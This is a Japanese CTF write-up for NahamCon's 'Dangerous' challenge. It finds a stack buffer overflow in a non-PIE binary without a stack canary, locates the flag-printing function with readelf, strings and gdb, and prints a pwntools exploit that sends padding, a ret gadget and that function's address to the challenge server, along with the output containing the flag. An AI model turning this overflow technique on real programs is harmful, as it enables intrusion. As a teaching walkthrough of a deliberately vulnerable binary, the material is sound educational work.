NahamCon CTF【Write up】
Dangerous
$ file dangerous dangerous: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2b7e7edf071a5dd08228a996ed76400783fba08c, for GNU/Linux 3.2.0, stripped
$ checksec.sh --file=./dangerous RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFYFortified Fortifiable FILE Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH No Symbols No 01 ./dangerous
とりあえず、BOFがあることがわかります。
$ ./dangerous
What's your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^M
It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
█
███
███
███
███
███
███
███
███
███
███████
█ ███ █
███
███
███
Segmentation fault (コアダンプ)
$ readelf -r ./dangerous 再配置セクション '.rela.dyn' at offset 0x550 contains 3 entries: オフセット 情報 型 シンボル値 シンボル名 + 加数 000000403ff0 000500000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0 000000403ff8 000600000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0 000000404060 000900000005 R_X86_64_COPY 0000000000404060 stdout@GLIBC_2.2.5 + 0 再配置セクション '.rela.plt' at offset 0x598 contains 6 entries: オフセット 情報 型 シンボル値 シンボル名 + 加数 000000404018 000100000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0 000000404020 000200000007 R_X86_64_JUMP_SLO 0000000000000000 strlen@GLIBC_2.2.5 + 0 000000404028 000300000007 R_X86_64_JUMP_SLO 0000000000000000 close@GLIBC_2.2.5 + 0 000000404030 000400000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0 000000404038 000700000007 R_X86_64_JUMP_SLO 0000000000000000 setvbuf@GLIBC_2.2.5 + 0 000000404040 000800000007 R_X86_64_JUMP_SLO 0000000000000000 open@GLIBC_2.2.5 + 0
open関数があるのでflag.txtをopenしてる関数があると推測することができます。一応stringsコマンドでも確認したところflag.txtという文字列があることがわかります。
$ strings ./dangerous 略 What's your name? Uh-oh... something's not right... good luck... ./flag.txt :*3$" GCC: (Ubuntu 9.2.1-9ubuntu2) 9.2.1 20191008 .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic
あとは、flag.txtをopenしている関数のアドレスを探してBOFで飛ばすだけです。
gdbを使ってentryポイントからコードを見ていくと、
gdb-peda$
0x401312: push rbp
0x401313: mov rbp,rsp
0x401316: sub rsp,0x210
0x40131d: mov esi,0x0
0x401322:
lea rdi,[rip+0xf16] # 0x40223f
0x401329: mov eax,0x0
0x40132e: call 0x4010e0 <open@plt>
0x401333: mov DWORD PTR [rbp-0x4],eax
0x401336: lea rcx,[rbp-0x210]
0x40133d: mov eax,DWORD PTR [rbp-0x4]
gdb-peda$
0x401340: mov edx,0x200
0x401345: mov rsi,rcx
0x401348: mov edi,eax
0x40134a: call 0x4010c0 <read@plt>
0x40134f: mov eax,DWORD PTR [rbp-0x4]
0x401352: mov edi,eax
0x401354: call 0x4010b0 <close@plt>
0x401359: lea rax,[rbp-0x210]
0x401360: mov rdi,rax
0x401363: call 0x401090 <puts@plt>
gdb-peda$
0x401368: nop
0x401369: leave
0x40136a: ret
ここらへんがそうっぽいです。
以下がExploitコードになります。
from pwn import * e = ELF('./dangerous') #p = process('./dangerous') p = remote('jh2i.com',50011) flag = 0x401312 ret_addr = 0x0040101a payload = 'A'*497 payload += p64(ret_addr) payload += p64(flag) p.sendline(payload) p.interactive()
$ python solve.py
[*]
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to jh2i.com on port 50011: Done
[*] Switching to interactive mode
What's your name?
It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
█
███
███
███
███
███
███
███
███
███
███████
█ ███ █
███
███
███
flag{legend_of_zelda_overflow_of_time}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
